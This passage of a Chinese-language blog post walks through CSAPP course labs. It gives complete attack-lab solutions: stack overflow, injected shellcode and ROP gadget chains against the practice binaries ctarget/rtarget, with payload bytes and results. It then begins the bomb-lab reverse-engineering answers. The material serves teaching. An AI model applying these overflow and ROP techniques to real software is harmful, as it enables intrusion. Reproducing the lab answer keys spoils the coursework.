显然,栈指针 rsp 减去 0x28 作为缓冲区调用 Gets 函数,我们需要做的仅仅是用 touch1 函数虚拟地址覆盖返回地址即可。

查看 touch1 函数汇编代码:

1
2
3
4
5
6
7
8
9
10
00000000004017c0 <touch1>:
4017c0: 48 83 ec 08 sub $0x8,%rsp
4017c4: c7 05 0e 2d 20 00 01 movl $0x1,0x202d0e(%rip) # 6044dc <vlevel>
4017cb: 00 00 00
4017ce: bf c5 30 40 00 mov $0x4030c5,%edi
4017d3: e8 e8 f4 ff ff callq 400cc0 <puts@plt>
4017d8: bf 01 00 00 00 mov $0x1,%edi
4017dd: e8 ab 04 00 00 callq 401c8d <validate>
4017e2: bf 00 00 00 00 mov $0x0,%edi
4017e7: e8 54 f6 ff ff callq 400e40 <exit@plt>

touch1 函数地址是 00000000004017c0, 栈地址可以通过 gdb 获取,不再赘述。所以答案应该是

level1

调用 Gets 之前,图中 old rsp 处存储上一个函数的地址 return address, 图中 rsp 所指的地址为当前 rsp 寄存器内容。

我们输入的字符会一直填充栈内存,前 0x28 字节任意填充,这里选择全 0 填充,后八个字节填充实际地址,因为 0x00 00 00 00 00 40 17 c0 最高字节为 00,所以只需要填前 7 个字节。

根据 C 语言机制,最后一个字节后面会填充为 0 , 可以达到我们的目的。

后面理论上也可以填充任意字节,但是那无关紧要,我们使用最简单的字节序列达到结果即可。

查看 getbuf 汇编代码:

1
2
3
4
5
6
7
8
9
00000000004017a8 <getbuf>:
4017a8: 48 83 ec 28 sub $0x28,%rsp
4017ac: 48 89 e7 mov %rsp,%rdi
4017af: e8 8c 02 00 00 callq 401a40 <Gets>
4017b4: b8 01 00 00 00 mov $0x1,%eax
4017b9: 48 83 c4 28 add $0x28,%rsp
4017bd: c3 retq
4017be: 90 nop
4017bf: 90 nop

先执行第 3 行, 调用 Gets 函数,执行完毕,我们的输入已经填充栈内存

然后执行第 4 行, eax 置为 1

执行第 5 行,栈指针增加 0x28, 指向 old rsp

执行第 6 行, 执行 栈指针内存地址代码段,即 touch1,也就达到了我们的目的

实际填充字节:

1
2
3
4
5
6
7
➜  target1 git:(master) ✗ cat level1.txt                  
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
c0 17 40 00 00 00 00

结果:

1
2
3
4
5
6
7
8
9
➜  target1 git:(master) cat level1.txt | ./hex2raw | ./ctarget -q
Cookie: 0x59b997fa
Type string:Touch1!: You called touch1()
Valid solution for level 1 with target ctarget
PASS: Would have posted the following:
user id bovik
course 15213-f15
lab attacklab
result 1:PASS:0xffffffff:ctarget:1:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 C0 17 40 00 00 00 00

实际执行的命令方式如果你不懂,可以阅读 attacklab

当然也可以 Google, 查阅关于 Linux 管道,流,标准输入,标准输出,标准错误概念

level2

目标:让 ctarget 执行 touch2 的代码,而不是返回 test。你必须造成的效果是:调用 touch2,传递 cookie 作为参数

查看 touch2 函数地址

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
00000000004017ec <touch2>:
4017ec: 48 83 ec 08 sub $0x8,%rsp
4017f0: 89 fa mov %edi,%edx
4017f2: c7 05 e0 2c 20 00 02 movl $0x2,0x202ce0(%rip) # 6044dc <vlevel>
4017f9: 00 00 00
4017fc: 3b 3d e2 2c 20 00 cmp 0x202ce2(%rip),%edi # 6044e4 <cookie>
401802: 75 20 jne 401824 <touch2+0x38>
401804: be e8 30 40 00 mov $0x4030e8,%esi
401809: bf 01 00 00 00 mov $0x1,%edi
40180e: b8 00 00 00 00 mov $0x0,%eax
401813: e8 d8 f5 ff ff callq 400df0 <__printf_chk@plt>
401818: bf 02 00 00 00 mov $0x2,%edi
40181d: e8 6b 04 00 00 callq 401c8d <validate>
401822: eb 1e jmp 401842 <touch2+0x56>
401824: be 10 31 40 00 mov $0x403110,%esi
401829: bf 01 00 00 00 mov $0x1,%edi
40182e: b8 00 00 00 00 mov $0x0,%eax
401833: e8 b8 f5 ff ff callq 400df0 <__printf_chk@plt>
401838: bf 02 00 00 00 mov $0x2,%edi
40183d: e8 0d 05 00 00 callq 401d4f <fail>
401842: bf 00 00 00 00 mov $0x0,%edi
401847: e8 f4 f5 ff ff callq 400e40 <exit@plt>

调用 touch2 很简单,传递地址就行,但核心问题是如何传递参数

显然需要注入代码

1
2
3
push $0x4017ec
mov $0x59b997fa, %edi
ret

level2

程序跳转到图中 rsp 处,执行栈内存代码

首先 push touch2 地址,touch2 地址 push 到 图中 old rsp 处

然后将立即数(我的cookie)给 edi 作为第一个参数

最后 ret 执行 touch2 代码段,完美

获取汇编代码的字节表示:

1
2
3
4
5
6
7
8
9
10
11
12
➜  target1 git:(master) ✗ gcc -c level2.s
➜ target1 git:(master) ✗ objdump -d level2.o

level2.o: 文件格式 elf64-x86-64


Disassembly of section .text:

0000000000000000 <.text>:
0: 68 ec 17 40 00 pushq $0x4017ec
5: bf fa 97 b9 59 mov $0x59b997fa,%edi
a: c3 retq

实际填充字节:

1
2
3
4
5
6
7
➜  target1 git:(master) ✗ cat level2.txt
68 ec 17 40 00 bf fa 97
b9 59 c3 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 dc 61 55 00 00 00

结果:

1
2
3
4
5
6
7
8
9
➜  target1 git:(master) cat level2.txt | ./hex2raw | ./ctarget -q
Cookie: 0x59b997fa
Type string:Touch2!: You called touch2(0x59b997fa)
Valid solution for level 2 with target ctarget
PASS: Would have posted the following:
user id bovik
course 15213-f15
lab attacklab
result 1:PASS:0xffffffff:ctarget:2:68 EC 17 40 00 BF FA 97 B9 59 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 DC 61 55 00 00 00

level3

目标:让 ctarget 执行 touch3 代码。以 cookie 表示的字符串作为参数

和 level2 唯一不同的是我们需要传递指针,而且字符串本身需要自己填充

汇编代码:

1
2
3
push $0x4018fa
mov $0x5561dca8, $edi
ret

push touch3 函数 将字符串指针传递给 edi 寄存器, 返回,调用 touch3

这里将字符串传递到 old rsp 上方,可以保证在调用 touch3 完成不会被破坏

字节表示(注意字符串的字节表示):

1
2
3
4
5
6
7
8
9
➜  target1 git:(master) ✗ cat level3.txt
68 fa 18 40 00 bf a8 dc
61 55 c3 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 dc 61 55 00 00 00 00
35 39 62 39 39 37 66 61
00

结果:

1
2
3
4
5
6
7
8
9
➜  target1 git:(master) ✗ cat level3.txt | ./hex2raw | ./ctarget -q
Cookie: 0x59b997fa
Type string:Touch3!: You called touch3("59b997fa")
Valid solution for level 3 with target ctarget
PASS: Would have posted the following:
user id bovik
course 15213-f15
lab attacklab
result 1:PASS:0xffffffff:ctarget:3:68 FA 18 40 00 BF A8 DC 61 55 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 DC 61 55 00 00 00 00 35 39 62 39 39 37 66 61 00

level4

目的:使用制定范围内的两个小工具调用 touch2, 并传递 cookie 参数

小工具指:特定函数范围内某些汇编指令可以利用起来完成我们想要的功能

1
2
3
0000000000400f15 <setval_210>:
400f15: c7 07 d4 48 89 c7 movl $0xc78948d4, (%rdi)
400f1b: c3 retq

48 89 c7 也是指令 movq %rax, %rdi 字节表示,我们可以通过填充指令地址,同时利用 ret 指令达到完成一些功能

字节表示:

1
2
3
4
5
6
7
8
9
10
➜  target1 git:(master) cat level4.txt
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
ab 19 40 00 00 00 00 00
fa 97 b9 59 00 00 00 00
c5 19 40 00 00 00 00 00
ec 17 40 00 00 00 00

首先执行 0x4019ab 处代码,对应位置代码为

1
2
3
popq $rax
nop
ret

将 cookie 赋给 rax 执行 rsp 处指令

0x 4019c5:

1
2
movq %rax, %rdi
ret

cookie 送到 rdi,跳到 touch2, 完美

结果:

1
2
3
4
5
6
7
8
9
➜  target1 git:(master) cat level4.txt | ./hex2raw | ./rtarget -q
Cookie: 0x59b997fa
Type string:Touch2!: You called touch2(0x59b997fa)
Valid solution for level 2 with target rtarget
PASS: Would have posted the following:
user id bovik
course 15213-f15
lab attacklab
result 1:PASS:0xffffffff:rtarget:2:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 AB 19 40 00 00 00 00 00 FA 97 B9 59 00 00 00 00 C5 19 40 00 00 00 00 00 EC 17 40 00 00 00 00

leve5

目的:执行 touch3 函数,将 cookie 字符串作为参数

此处程序本身使用栈指针随机化技术,每次 rsp 值不固定,所以需要记录 rsp

实际字节:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
➜  target1 git:(master) cat level5.txt                           
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
06 1a 40 00 00 00 00 00
a2 19 40 00 00 00 00 00
ab 19 40 00 00 00 00 00
48 00 00 00 00 00 00 00
dd 19 40 00 00 00 00 00
34 1a 40 00 00 00 00 00
13 1a 40 00 00 00 00 00
d6 19 40 00 00 00 00 00
a2 19 40 00 00 00 00 00
fa 18 40 00 00 00 00 00
35 39 62 39 39 37 66 61
00

汇编代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
movq %rsp, %rax
retq

movq %rax, %rdi
retq

popq %rax
nop
retq

movl %eax, %edx
nop
retq

movl %edx, %ecx
cmpb %c9, %c9
retq

mov %ecx, %esi
nop
nop
retq

lea (%rdi, %rsi, 1), %rax
retq

movq %rax, %rdi
retq

获取栈指针,然后栈上存储偏移,加和得到实际字符串指针,然后跳转到 touch3

明白指令含义,还有 rsp 始终代表当前程序栈顶,就不困难

结果:

1
2
3
4
5
6
7
8
9
➜  target1 git:(master) cat level5.txt | ./hex2raw | ./rtarget -q
Cookie: 0x59b997fa
Type string:Touch3!: You called touch3("59b997fa")
Valid solution for level 3 with target rtarget
PASS: Would have posted the following:
user id bovik
course 15213-f15
lab attacklab
result 1:PASS:0xffffffff:rtarget:3:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 1A 40 00 00 00 00 00 A2 19 40 00 00 00 00 00 AB 19 40 00 00 00 00 00 48 00 00 00 00 00 00 00 DD 19 40 00 00 00 00 00 34 1A 40 00 00 00 00 00 13 1A 40 00 00 00 00 00 D6 19 40 00 00 00 00 00 A2 19 40 00 00 00 00 00 FA 18 40 00 00 00 00 00 35 39 62 39 39 37 66 61 00

全文完

任何建议或者疑问你可以发我邮件: ardxwe@gmail.com

关于课程

这门课程围绕 CSAPP 展开。

书本相关的所有信息,你可以在 这里 找到。

你可以在 Bilibili 或者 YouTube 查看所有的课程视频,Bilibili附带中文字幕。

建议看完相应的章节然后去做相应的实验。大名鼎鼎的 CSAPP 的作者即是这门课程的讲师。你可以在 这里 找到实验相关的所有内容。

这门课程的实验代码可以在我的 Github 找到我的所有解答及相关资料。本次实验相关代码在 ./bomb 文件夹下。

bomb lab

文档

点击 这里, 然后点击标红处 Self-Study Handout 即可下载此次实验对应的文档。

解压之后文件夹对应目录:

1
2
3
4
5
6
7
➜  下载 tree bomb       
bomb
├── bomb
├── bomb.c
└── README

0 directories, 3 files
  • bomb: 可执行文件
  • bomb.c: 对应的部分 C 代码
  • README: 本次实验的简单说明

内容

bomb目标代码文件运行时提示用户输入6个不同字符串,其中任意一个不正确炸弹会爆炸,也就意味着实验的失败。我们需要通过逆向工程来拆除炸弹,需要使用 gdb 和 objdump 。

环境

Linux, 请不要使用 Windows :)

过程

分析

执行 bomb 程序

1
2
3
4
➜  bomb git:(master) ./bomb          
Welcome to my fiendish little bomb. You have 6 phases with
which to blow yourself up. Have a nice day!

一切正常。查看 bomb.c 程序:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
/***************************************************************************
* Dr. Evil's Insidious Bomb, Version 1.1
* Copyright 2011, Dr. Evil Incorporated. All rights reserved.
*
* LICENSE:
*
* Dr. Evil Incorporated (the PERPETRATOR) hereby grants you (the
* VICTIM) explicit permission to use this bomb (the BOMB). This is a
* time limited license, which expires on the death of the VICTIM.
* The PERPETRATOR takes no responsibility for damage, frustration,
* insanity, bug-eyes, carpal-tunnel syndrome, loss of sleep, or other
* harm to the VICTIM. Unless the PERPETRATOR wants to take credit,
* that is. The VICTIM may not distribute this bomb source code to
* any enemies of the PERPETRATOR. No VICTIM may debug,
* reverse-engineer, run "strings" on, decompile, decrypt, or use any
* other technique to gain knowledge of and defuse the BOMB. BOMB
* proof clothing may not be worn when handling this program. The
* PERPETRATOR will not apologize for the PERPETRATOR's poor sense of
* humor. This license is null and void where the BOMB is prohibited
* by law.
***************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include "support.h"
#include "phases.h"

/*
* Note to self: Remember to erase this file so my victims will have no
* idea what is going on, and so they will all blow up in a
* spectaculary fiendish explosion. -- Dr. Evil
*/

FILE *infile;

int main(int argc, char *argv[])
{
char *input;

/* Note to self: remember to port this bomb to Windows and put a
* fantastic GUI on it. */

/* When run with no arguments, the bomb reads its input lines
* from standard input. */
if (argc == 1) {
infile = stdin;
}

/* When run with one argument <file>, the bomb reads from <file>
* until EOF, and then switches to standard input. Thus, as you
* defuse each phase, you can add its defusing string to <file> and
* avoid having to retype it. */
else if (argc == 2) {
if (!(infile = fopen(argv[1], "r"))) {
printf("%s: Error: Couldn't open %s\n", argv[0], argv[1]);
exit(8);
}
}

/* You can't call the bomb with more than 1 command line argument. */
else {
printf("Usage: %s [<input_file>]\n", argv[0]);
exit(8);
}

/* Do all sorts of secret stuff that makes the bomb harder to defuse. */
initialize_bomb();

printf("Welcome to my fiendish little bomb. You have 6 phases with\n");
printf("which to blow yourself up. Have a nice day!\n");

/* Hmm... Six phases must be more secure than one phase! */
input = read_line(); /* Get input */
phase_1(input); /* Run the phase */
phase_defused(); /* Drat! They figured it out!
* Let me know how they did it. */
printf("Phase 1 defused. How about the next one?\n");

/* The second phase is harder. No one will ever figure out
* how to defuse this... */
input = read_line();
phase_2(input);
phase_defused();
printf("That's number 2. Keep going!\n");

/* I guess this is too easy so far. Some more complex code will
* confuse people. */
input = read_line();
phase_3(input);
phase_defused();
printf("Halfway there!\n");

/* Oh yeah? Well, how good is your math? Try on this saucy problem! */
input = read_line();
phase_4(input);
phase_defused();
printf("So you got that one. Try this one.\n");

/* Round and 'round in memory we go, where we stop, the bomb blows! */
input = read_line();
phase_5(input);
phase_defused();
printf("Good work! On to the next...\n");

/* This phase will never be used, since no one will get past the
* earlier ones. But just in case, make this one extra hard. */
input = read_line();
phase_6(input);
phase_defused();

/* Wow, they got it! But isn't something... missing? Perhaps
* something they overlooked? Mua ha ha ha ha! */

return 0;
}

由 45-64行可知, bomb程序可以通过标准输入和文件执行, 指定相应的文件在第二个参数。使用我已经破解的结果文件运行。

1
2
3
4
5
6
7
8
9
➜  bomb git:(master) ./bomb ./result
Welcome to my fiendish little bomb. You have 6 phases with
which to blow yourself up. Have a nice day!
Phase 1 defused. How about the next one?
That's number 2. Keep going!
Halfway there!
So you got that one. Try this one.
Good work! On to the next...
Congratulations! You've defused the bomb!

没有任何问题。毫无疑问,首先反汇编。

1
➜  bomb git:(master) ✗ objdump -d bomb > assemblycode

查看 main 处代码段。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
0000000000400da0 <main>:
400da0: 53 push %rbx
400da1: 83 ff 01 cmp $0x1,%edi
400da4: 75 10 jne 400db6 <main+0x16>
400da6: 48 8b 05 9b 29 20 00 mov 0x20299b(%rip),%rax # 603748 <stdin@@GLIBC_2.2.5>
400dad: 48 89 05 b4 29 20 00 mov %rax,0x2029b4(%rip) # 603768 <infile>
400db4: eb 63 jmp 400e19 <main+0x79>
400db6: 48 89 f3 mov %rsi,%rbx
400db9: 83 ff 02 cmp $0x2,%edi
400dbc: 75 3a jne 400df8 <main+0x58>
400dbe: 48 8b 7e 08 mov 0x8(%rsi),%rdi
400dc2: be b4 22 40 00 mov $0x4022b4,%esi
400dc7: e8 44 fe ff ff callq 400c10 <fopen@plt>
400dcc: 48 89 05 95 29 20 00 mov %rax,0x202995(%rip) # 603768 <infile>
400dd3: 48 85 c0 test %rax,%rax
400dd6: 75 41 jne 400e19 <main+0x79>
400dd8: 48 8b 4b 08 mov 0x8(%rbx),%rcx
400ddc: 48 8b 13 mov (%rbx),%rdx
400ddf: be b6 22 40 00 mov $0x4022b6,%esi
400de4: bf 01 00 00 00 mov $0x1,%edi
400de9: e8 12 fe ff ff callq 400c00 <__printf_chk@plt>
400dee: bf 08 00 00 00 mov $0x8,%edi
400df3: e8 28 fe ff ff callq 400c20 <exit@plt>
400df8: 48 8b 16 mov (%rsi),%rdx
400dfb: be d3 22 40 00 mov $0x4022d3,%esi
400e00: bf 01 00 00 00 mov $0x1,%edi
400e05: b8 00 00 00 00 mov $0x0,%eax
400e0a: e8 f1 fd ff ff callq 400c00 <__printf_chk@plt>
400e0f: bf 08 00 00 00 mov $0x8,%edi
400e14: e8 07 fe ff ff callq 400c20 <exit@plt>
400e19: e8 84 05 00 00 callq 4013a2 <initialize_bomb>
400e1e: bf 38 23 40 00 mov $0x402338,%edi
400e23: e8 e8 fc ff ff callq 400b10 <puts@plt>
400e28: bf 78 23 40 00 mov $0x402378,%edi
400e2d: e8 de fc ff ff callq 400b10 <puts@plt>
400e32: e8 67 06 00 00 callq 40149e <read_line>
400e37: 48 89 c7 mov %rax,%rdi
400e3a: e8 a1 00 00 00 callq 400ee0 <phase_1>
400e3f: e8 80 07 00 00 callq 4015c4 <phase_defused>
400e44: bf a8 23 40 00 mov $0x4023a8,%edi
400e49: e8 c2 fc ff ff callq 400b10 <puts@plt>
400e4e: e8 4b 06 00 00 callq 40149e <read_line>
400e53: 48 89 c7 mov %rax,%rdi
400e56: e8 a1 00 00 00 callq 400efc <phase_2>
400e5b: e8 64 07 00 00 callq 4015c4 <phase_defused>
400e60: bf ed 22 40 00 mov $0x4022ed,%edi
400e65: e8 a6 fc ff ff callq 400b10 <puts@plt>
400e6a: e8 2f 06 00 00 callq 40149e <read_line>
400e6f: 48 89 c7 mov %rax,%rdi
400e72: e8 cc 00 00 00 callq 400f43 <phase_3>
400e77: e8 48 07 00 00 callq 4015c4 <phase_defused>
400e7c: bf 0b 23 40 00 mov $0x40230b,%edi
400e81: e8 8a fc ff ff callq 400b10 <puts@plt>
400e86: e8 13 06 00 00 callq 40149e <read_line>
400e8b: 48 89 c7 mov %rax,%rdi
400e8e: e8 79 01 00 00 callq 40100c <phase_4>
400e93: e8 2c 07 00 00 callq 4015c4 <phase_defused>
400e98: bf d8 23 40 00 mov $0x4023d8,%edi
400e9d: e8 6e fc ff ff callq 400b10 <puts@plt>
400ea2: e8 f7 05 00 00 callq 40149e <read_line>
400ea7: 48 89 c7 mov %rax,%rdi
400eaa: e8 b3 01 00 00 callq 401062 <phase_5>
400eaf: e8 10 07 00 00 callq 4015c4 <phase_defused>
400eb4: bf 1a 23 40 00 mov $0x40231a,%edi
400eb9: e8 52 fc ff ff callq 400b10 <puts@plt>
400ebe: e8 db 05 00 00 callq 40149e <read_line>
400ec3: 48 89 c7 mov %rax,%rdi
400ec6: e8 29 02 00 00 callq 4010f4 <phase_6>
400ecb: e8 f4 06 00 00 callq 4015c4 <phase_defused>
400ed0: b8 00 00 00 00 mov $0x0,%eax
400ed5: 5b pop %rbx
400ed6: c3 retq
400ed7: 90 nop
400ed8: 90 nop
400ed9: 90 nop
400eda: 90 nop
400edb: 90 nop
400edc: 90 nop
400edd: 90 nop
400ede: 90 nop
400edf: 90 nop

第一个短语

查看 bomb.c 第73行可知: readline 函数返回指向输入的第一个字符的指针。

查看 main 函数第36-38行。

1
2
3
400e32:    e8 67 06 00 00           callq  40149e <read_line>
400e37: 48 89 c7 mov %rax,%rdi
400e3a: e8 a1 00 00 00 callq 400ee0 <phase_1>
  • 1 调用 read_line 函数
  • 2 read_line 函数返回结果存在 rax 寄存器, 将其移入 rdi 寄存器,作为之后函数的第一个参数。
  • 3 调用 phase_1 函数。

输入的字符指针作为第一个参数,一切都是那么的自然。根据38行指定的地址,查看 phase_1 函数汇编代码。

1
2
3
4
5
6
7
8
9
0000000000400ee0 <phase_1>:
400ee0: 48 83 ec 08 sub $0x8,%rsp
400ee4: be 00 24 40 00 mov $0x402400,%esi
400ee9: e8 4a 04 00 00 callq 401338 <strings_not_equal>
400eee: 85 c0 test %eax,%eax
400ef0: 74 05 je 400ef7 <phase_1+0x17>
400ef2: e8 43 05 00 00 callq 40143a <explode_bomb>
400ef7: 48 83 c4 08 add $0x8,%rsp
400efb: c3 retq

查看2-3行。

  • 2 内存地址 0x402400 移入 esi寄存器
  • 3 调用 strings_not_equal 函数,此时 rdi 为 input

从 strings_not_equal 函数名称和它所对应的两个参数可以知道:
input 应该和对应内存位置字符串相等。

我们使用 gdb 查看对应内存位置字符串:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
➜  bomb git:(master) gdb bomb
GNU gdb (Ubuntu 9.1-0ubuntu1) 9.1
Copyright (C) 2020 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from bomb...
(gdb) p (char*)0x402400
$1 = 0x402400 "Border relations with Canada have never been better."
(gdb)

尝试运行 bomb 程序输入对应字符串试试:

1
2
3
4
5
6
➜  bomb git:(master) ./bomb
Welcome to my fiendish little bomb. You have 6 phases with
which to blow yourself up. Have a nice day!
Border relations with Canada have never been better.
Phase 1 defused. How about the next one?

是的,我们成功了!

第四行之后的汇编代码主要是:如果函数返回0,成功返回。不是0,调用 explode_bomb 函数,代表着我们的输入失败了。

第二个短语

查看 main 函数第 42-44 行。

1
2
3
400e4e:    e8 4b 06 00 00           callq  40149e <read_line>
400e53: 48 89 c7 mov %rax,%rdi
400e56: e8 a1 00 00 00 callq 400efc <phase_2>

和第一个方式相同,不再赘述。

查看对应位置 phase_2 汇编代码。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
0000000000400efc <phase_2>:
400efc: 55 push %rbp
400efd: 53 push %rbx
400efe: 48 83 ec 28 sub $0x28,%rsp
400f02: 48 89 e6 mov %rsp,%rsi
400f05: e8 52 05 00 00 callq 40145c <read_six_numbers>
400f0a: 83 3c 24 01 cmpl $0x1,(%rsp)
400f0e: 74 20 je 400f30 <phase_2+0x34>
400f10: e8 25 05 00 00 callq 40143a <explode_bomb>
400f15: eb 19 jmp 400f30 <phase_2+0x34>
400f17: 8b 43 fc mov -0x4(%rbx),%eax
400f1a: 01 c0 add %eax,%eax
400f1c: 39 03 cmp %eax,(%rbx)
400f1e: 74 05 je 400f25 <phase_2+0x29>
400f20: e8 15 05 00 00 callq 40143a <explode_bomb>
400f25: 48 83 c3 04 add $0x4,%rbx
400f29: 48 39 eb cmp %rbp,%rbx
400f2c: 75 e9 jne 400f17 <phase_2+0x1b>
400f2e: eb 0c jmp 400f3c <phase_2+0x40>
400f30: 48 8d 5c 24 04 lea 0x4(%rsp),%rbx
400f35: 48 8d 6c 24 18 lea 0x18(%rsp),%rbp
400f3a: eb db jmp 400f17 <phase_2+0x1b>
400f3c: 48 83 c4 28 add $0x28,%rsp
400f40: 5b pop %rbx
400f41: 5d pop %rbp
400f42: c3 retq
  • 3-6: 将6个数字读到栈上。
  • 7-9: 第一个数字不为1, 炸弹爆炸, 为1,跳到20行
  • 10-26:检查每个数字是否为上个数字的2倍,不是则炸弹爆炸。

所以答案应该是: 1 2 4 8 16 32

1
2
3
4
5
6
7
8
➜  bomb git:(master) ./bomb
Welcome to my fiendish little bomb. You have 6 phases with
which to blow yourself up. Have a nice day!
Border relations with Canada have never been better.
Phase 1 defused. How about the next one?
1 2 4 8 16 32
That's number 2. Keep going!

第三个短语

查看 main 函数48-50行。

1
2
3
400e6a:    e8 2f 06 00 00           callq  40149e <read_line>
400e6f: 48 89 c7 mov %rax,%rdi
400e72: e8 cc 00 00 00 callq 400f43 <phase_3>

查看对应位置的 phase_3 代码段:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
0000000000400f43 <phase_3>:
400f43: 48 83 ec 18 sub $0x18,%rsp
400f47: 48 8d 4c 24 0c lea 0xc(%rsp),%rcx
400f4c: 48 8d 54 24 08 lea 0x8(%rsp),%rdx
400f51: be cf 25 40 00 mov $0x4025cf,%esi
400f56: b8 00 00 00 00 mov $0x0,%eax
400f5b: e8 90 fc ff ff callq 400bf0 <__isoc99_sscanf@plt>
400f60: 83 f8 01 cmp $0x1,%eax
400f63: 7f 05 jg 400f6a <phase_3+0x27>
400f65: e8 d0 04 00 00 callq 40143a <explode_bomb>
400f6a: 83 7c 24 08 07 cmpl $0x7,0x8(%rsp)
400f6f: 77 3c ja 400fad <phase_3+0x6a>
400f71: 8b 44 24 08 mov 0x8(%rsp),%eax
400f75: ff 24 c5 70 24 40 00 jmpq *0x402470(,%rax,8)
400f7c: b8 cf 00 00 00 mov $0xcf,%eax
400f81: eb 3b jmp 400fbe <phase_3+0x7b>
400f83: b8 c3 02 00 00 mov $0x2c3,%eax
400f88: eb 34 jmp 400fbe <phase_3+0x7b>
400f8a: b8 00 01 00 00 mov $0x100,%eax
400f8f: eb 2d jmp 400fbe <phase_3+0x7b>
400f91: b8 85 01 00 00 mov $0x185,%eax
400f96: eb 26 jmp 400fbe <phase_3+0x7b>
400f98: b8 ce 00 00 00 mov $0xce,%eax
400f9d: eb 1f jmp 400fbe <phase_3+0x7b>
400f9f: b8 aa 02 00 00 mov $0x2aa,%eax
400fa4: eb 18 jmp 400fbe <phase_3+0x7b>
400fa6: b8 47 01 00 00 mov $0x147,%eax
400fab: eb 11 jmp 400fbe <phase_3+0x7b>
400fad: e8 88 04 00 00 callq 40143a <explode_bomb>
400fb2: b8 00 00 00 00 mov $0x0,%eax
400fb7: eb 05 jmp 400fbe <phase_3+0x7b>
400fb9: b8 37 01 00 00 mov $0x137,%eax
400fbe: 3b 44 24 0c cmp 0xc(%rsp),%eax
400fc2: 74 05 je 400fc9 <phase_3+0x86>
400fc4: e8 71 04 00 00 callq 40143a <explode_bomb>
400fc9: 48 83 c4 18 add $0x18,%rsp
400fcd: c3 retq

gdb 打印第5行内存内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
➜  bomb git:(master) gdb bomb
GNU gdb (Ubuntu 9.1-0ubuntu1) 9.1
Copyright (C) 2020 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from bomb...
(gdb) p (char*)0x4025cf
$1 = 0x4025cf "%d %d"
(gdb)
  • 7-10: 输入最少为两个整数
  • 11-37: 第一个数 <= 7, 第二个数由第一个数所计算出来的内存位置所决定

由第14行可知:跳转地址为 0x402470 + (第一个数 * 8) 地址所对应的值

gdb 查看 0x402470 附近100个字节的内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
(gdb) x/100x 0x402470
0x402470: 0x00400f7c 0x00000000 0x00400fb9 0x00000000
0x402480: 0x00400f83 0x00000000 0x00400f8a 0x00000000
0x402490: 0x00400f91 0x00000000 0x00400f98 0x00000000
0x4024a0: 0x00400f9f 0x00000000 0x00400fa6 0x00000000
0x4024b0 <array.3449>: 0x7564616d 0x73726569 0x746f666e 0x6c796276
0x4024c0: 0x79206f53 0x7420756f 0x6b6e6968 0x756f7920
0x4024d0: 0x6e616320 0x6f747320 0x68742070 0x6f622065
